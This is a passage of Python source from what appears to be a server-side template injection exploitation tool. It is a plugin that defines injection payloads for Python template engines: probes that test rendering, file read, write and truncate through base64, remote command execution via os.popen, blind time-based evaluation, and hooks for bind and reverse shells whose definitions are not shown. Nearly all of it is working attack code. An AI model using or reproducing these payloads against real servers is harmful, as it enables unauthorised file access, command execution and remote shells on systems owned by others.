(self)
| 10 | class Python(Plugin): |
| 11 | |
| 12 | def language_init(self): |
| 13 | |
| 14 | self.update_actions({ |
| 15 | 'render' : { |
| 16 | 'render': """str(%(code)s)""", |
| 17 | 'header': """'%(header)s'+""", |
| 18 | 'trailer': """+'%(trailer)s'""", |
| 19 | 'test_render': """'%(s1)s'.join('%(s2)s')""" % { |
| 20 | 's1' : rand.randstrings[0], |
| 21 | 's2' : rand.randstrings[1] |
| 22 | }, |
| 23 | 'test_render_expected': '%(res)s' % { |
| 24 | 'res' : rand.randstrings[0].join(rand.randstrings[1]) |
| 25 | } |
| 26 | }, |
| 27 | 'write' : { |
| 28 | 'call' : 'evaluate', |
| 29 | 'write' : """open("%(path)s", 'ab+').write(__import__("base64").urlsafe_b64decode('%(chunk_b64)s'))""", |
| 30 | 'truncate' : """open("%(path)s", 'w').close()""" |
| 31 | }, |
| 32 | 'read' : { |
| 33 | 'call': 'evaluate', |
| 34 | 'read' : """__import__("base64").b64encode(open("%(path)s", "rb").read())""" |
| 35 | }, |
| 36 | 'md5' : { |
| 37 | 'call': 'evaluate', |
| 38 | 'md5': """__import__("hashlib").md5(open("%(path)s", 'rb').read()).hexdigest()""" |
| 39 | }, |
| 40 | 'evaluate' : { |
| 41 | 'call': 'render', |
| 42 | 'evaluate': """%(code)s""", |
| 43 | 'test_os': """'-'.join([__import__('os').name, __import__('sys').platform])""", |
| 44 | 'test_os_expected': '^[\w-]+$' |
| 45 | }, |
| 46 | 'execute' : { |
| 47 | 'call': 'evaluate', |
| 48 | 'execute': """__import__('os').popen(__import__('base64').urlsafe_b64decode('%(code_b64)s').decode()).read()""", |
| 49 | 'test_cmd': bash.echo % { 's1': rand.randstrings[2] }, |
| 50 | 'test_cmd_expected': rand.randstrings[2] |
| 51 | }, |
| 52 | 'blind' : { |
| 53 | 'call': 'evaluate_blind', |
| 54 | 'test_bool_true' : """'a'.join('ab') == 'aab'""", |
| 55 | 'test_bool_false' : 'True == False' |
| 56 | }, |
| 57 | 'evaluate_blind' : { |
| 58 | 'call': 'evaluate', |
| 59 | 'evaluate_blind': """eval(__import__('base64').urlsafe_b64decode('%(code_b64)s').decode()) and __import__('time').sleep(%(delay)i)""" |
| 60 | }, |
| 61 | 'bind_shell' : { |
| 62 | 'call' : 'execute_blind', |
| 63 | 'bind_shell': bash.bind_shell |
| 64 | }, |
| 65 | 'reverse_shell' : { |
| 66 | 'call': 'execute_blind', |
| 67 | 'reverse_shell' : bash.reverse_shell |
| 68 | }, |
| 69 | 'execute_blind' : { |
nothing calls this directly
no test coverage detected